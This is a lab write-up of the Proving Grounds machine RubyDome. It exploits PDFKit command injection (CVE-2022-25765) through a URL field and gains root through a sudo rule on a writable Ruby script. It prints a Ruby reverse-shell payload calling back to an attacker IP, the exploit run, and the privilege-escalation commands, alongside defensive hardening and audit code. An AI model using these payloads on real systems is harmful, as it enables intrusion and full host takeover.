# RubyDome

## Intro

RubyDome is a Proving Grounds machine that exposes a Ruby WEBrick "HTML to PDF" service on port 3000. The service builds PDFs with the PDFKit gem, whose command-injection bug (CVE-2022-25765) gives a shell as the user `andrew`. A sudo rule that lets `andrew` run `/usr/bin/ruby` as root on a script he owns then leads straight to root.

## Initial Foothold

Nmap scan output (SSH on 22, WEBrick/Ruby 3.0.2 on 3000):

```
# Nmap 7.94SVN scan initiated Fri Mar 22 10:30:28 2024 as: nmap -sC -sV -vv -oA nmap/initial rubydome.pg
Nmap scan report for rubydome.pg (192.168.202.22)
Host is up, received reset ttl 61 (0.043s latency).
Scanned at 2024-03-22 10:30:29 CDT for 9s
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBYESg2KmNLhFh1KJaN2UFCVAEv6MWr58pqp2fIpCSBEK2wDJ5ap2XVBVGLk9Po4eKBbqTo96yttfVUvXWXoN3M=
|   256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBdIs4PWZ8yY2OQ6Jlk84Ihd5+15Nb3l0qvpf1ls3wfa
3000/tcp open  http    syn-ack ttl 61 WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: RubyDome HTML to PDF
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 22 10:30:38 2024 -- 1 IP address (1 host up) scanned in 9.83 seconds
```

The RubyDome web page on port 3000 takes a URL and converts it to a PDF.

The backend uses the PDFKit Ruby gem, for which a public command-injection exploit exists (CVE-2022-25765), found with searchsploit:

```
┌──(joe㉿kali)-[~]
└─$ searchsploit pdfkit --disable-colour
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
pdfkit v0.8.7.2 - Command Injection                                                                             | ruby/local/51293.py
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

Running that exploit against the `/pdf` endpoint (POST parameter `url`) sends a URL containing a backtick-wrapped Ruby reverse-shell command; the unescaped URL reaches a shell, and the callback lands as the user `andrew`:

```
┌──(joe㉿kali)-[~/hax/pg/rubydome]
└─$ python3 51293.py -s 192.168.45.152 80 -w http://rubydome.pg:3000/pdf -p url

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2022–25765 (pdfkit) - Command Injection
OPTIONS: Reverse Shell Sent to Target Website Mode
PAYLOAD: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.168.45.152","80"))'`
LOCALIP: 192.168.45.152:80
WARNING: Be sure to start a local listener on the above IP and port. "nc -lnvp 80".
WEBSITE: http://rubydome.pg:3000/pdf
POSTARG: url
EXPLOIT: Payload sent to website!
SUCCESS: Exploit performed action.
```
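The injection above works because the target passes the user-supplied URL into a shell command line. The following is an added example, not RubyDome's `app.rb` and not PDFKit's own code: it models that vulnerable pattern for contrast and shows one hardened input path. The function names (`vulnerable_command`, `safe_url?`, `hardened_argv`) and the `wkhtmltopdf` argument order are assumptions for illustration.

```ruby
# Added example (not RubyDome's app.rb, not PDFKit's own code): the defect
# class behind CVE-2022-25765 and one way to harden the URL-to-PDF input path.
require 'uri'

# Vulnerable pattern: the URL is interpolated into a shell command string, so
# any backtick or $() sequence inside it is executed by /bin/sh. Shown only
# for contrast; nothing in this file executes it.
def vulnerable_command(url)
  "wkhtmltopdf #{url} page.pdf" # url reaches the shell unescaped
end

# Allowlist of characters that may legally appear in a URL (RFC 3986 subset).
# Whitespace, backticks, quotes and <> are not on the list, so the payload
# style seen above is rejected before anything else happens.
URL_CHARS = %r{\A[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+\z}

# Accept only absolute http(s) URLs with a host; everything else is refused.
def safe_url?(url)
  return false unless url.is_a?(String) && url.match?(URL_CHARS)
  uri = URI.parse(url)
  %w[http https].include?(uri.scheme) && !uri.host.to_s.empty?
rescue URI::InvalidURIError
  false
end

# Hardened: validate, then build an argv array. Passing an array to
# Process.spawn / Open3.capture2 means no shell ever sees the URL, which is
# the control that actually removes the injection; the allowlist is depth.
def hardened_argv(url, output = 'page.pdf')
  raise ArgumentError, 'rejected URL' unless safe_url?(url)
  ['wkhtmltopdf', url, output]
end
```

The allowlist alone is not enough, because `$`, `(` and `)` are legitimate URL characters; the argv form is what guarantees the URL is never interpreted by a shell, and the validation keeps `file://` and other schemes away from the renderer.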

Reverse shell listener, followed by a PTY upgrade and the local flag:

```
┌──(joe㉿kali)-[~]
└─$ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.152] from (UNKNOWN) [192.168.202.22] 45852
whoami
andrew
which python3 
/usr/bin/python3
python3 -c "import pty;pty.spawn('/bin/bash')"
andrew@rubydome:~/app$ cd ..
cd ..
andrew@rubydome:~$ ls -la
ls -la
total 32
drwxr-x--- 3 andrew andrew 4096 Jun 13  2023 .
drwxr-xr-x 3 root   root   4096 Apr 25  2023 ..
drwxr-xr-x 2 andrew andrew 4096 Apr 25  2023 app
lrwxrwxrwx 1 root   root      9 Apr 25  2023 .bash_history -> /dev/null
-rw-r--r-- 1 andrew andrew  220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 andrew andrew 3771 Jan  6  2022 .bashrc
-rw-rw-r-- 1 andrew andrew   33 Mar 22 15:26 local.txt
-rw-r--r-- 1 andrew andrew  807 Jan  6  2022 .profile
-rw-r--r-- 1 andrew andrew    0 Apr 25  2023 .sudo_as_admin_successful
-rw------- 1 andrew andrew  774 Jun 13  2023 .viminfo
andrew@rubydome:~$ cat local.txt
cat local.txt
c2c845c2342a613d302ea0d415882241
```

## Privilege Escalation

`sudo -l` shows that `andrew` may run `/usr/bin/ruby /home/andrew/app/app.rb` as root without a password, and `app.rb` is owned and writable by `andrew`. Backing up the script, replacing it with a single `system('/bin/bash')` call and invoking it through sudo yields a root shell.

```
andrew@rubydome:~/app$ sudo -l
sudo -l
Matching Defaults entries for andrew on rubydome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User andrew may run the following commands on rubydome:
    (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb
andrew@rubydome:~/app$ ls -la
ls -la
total 148
drwxr-xr-x 2 andrew andrew   4096 Mar 22 16:17 .
drwxr-x--- 5 andrew andrew   4096 Mar 22 16:16 ..
-rwxrwx--- 1 andrew andrew   1032 Apr 24  2023 app.rb
-rw-rw-r-- 1 andrew andrew 131089 Mar 22 16:17 linpeas-output.txt
-rw-rw-r-- 1 andrew andrew   1220 Mar 22 15:46 page.pdf
andrew@rubydome:~/app$ cp app.rb app.rb.bak
cp app.rb app.rb.bak
andrew@rubydome:~/app$ echo "system('/bin/bash')" > app.rb
echo "system('/bin/bash')" > app.rb
andrew@rubydome:~/app$ sudo /usr/bin/ruby /home/andrew/app/app.rb
sudo /usr/bin/ruby /home/andrew/app/app.rb
root@rubydome:/home/andrew/app# whoami
whoami
root
root@rubydome:/home/andrew/app# cat /root/proof.txt
cat /root/proof.txt
2f232fecea3a2b5116cb328b9471bdd3
```
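The root cause here is a sudo rule whose argument is a file the invoking user can modify. As an added example, not part of the writeup's own commands, the Ruby check below parses `sudo -l`-style output and reports any absolute-path argument the current user can write to. The sample `sudo -l` text is constructed in the shape seen above, with the script path substituted at run time so the check can run anywhere; the function names and the second rule's `/opt/constructed/...` path are illustrative assumptions.

```ruby
# Added example (not RubyDome's own commands): audit sudo rules for
# user-writable command arguments, the pattern that gave root here.
require 'tempfile'

# Constructed sample of `sudo -l` output; %<script>s is filled in by the caller.
SAMPLE_SUDO_L = <<~TXT
  Matching Defaults entries for andrew on rubydome:
      env_reset, mail_badpass, use_pty

  User andrew may run the following commands on rubydome:
      (ALL) NOPASSWD: /usr/bin/ruby %<script>s
      (root) /opt/constructed/nonexistent/tool --status
TXT

# Return the command specs from sudo -l output: rule lines begin with "(user)"
# and may carry a NOPASSWD: tag, both of which are stripped.
def sudo_commands(text)
  text.lines.map(&:strip)
      .select { |l| l.start_with?('(') }
      .map { |l| l.sub(/\A\([^)]*\)\s*(?:NOPASSWD:\s*)?/, '') }
end

# Map each command to the absolute-path arguments the current process can
# write to. A non-empty list means the rule can be turned into arbitrary code
# running as the rule's target user, as with app.rb above.
def writable_sudo_targets(text)
  sudo_commands(text).each_with_object({}) do |cmd, out|
    paths = cmd.split.select { |tok| tok.start_with?('/') && File.writable?(tok) }
    out[cmd] = paths unless paths.empty?
  end
end

# Stand-alone demonstration with a temporary, writable "app.rb".
if __FILE__ == $PROGRAM_NAME
  script = Tempfile.new(['app', '.rb'])
  script.write("puts 'demo'\n")
  script.close
  writable_sudo_targets(format(SAMPLE_SUDO_L, script: script.path)).each do |cmd, paths|
    puts "risky rule: #{cmd}\n  writable: #{paths.join(', ')}"
  end
end
```

The interpreter itself (`/usr/bin/ruby`) is a second problem the check does not cover: granting an interpreter via sudo is equivalent to granting root, regardless of which script the rule names, so the fix is a root-owned, non-writable wrapper with a fixed script path rather than a tighter file mode.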
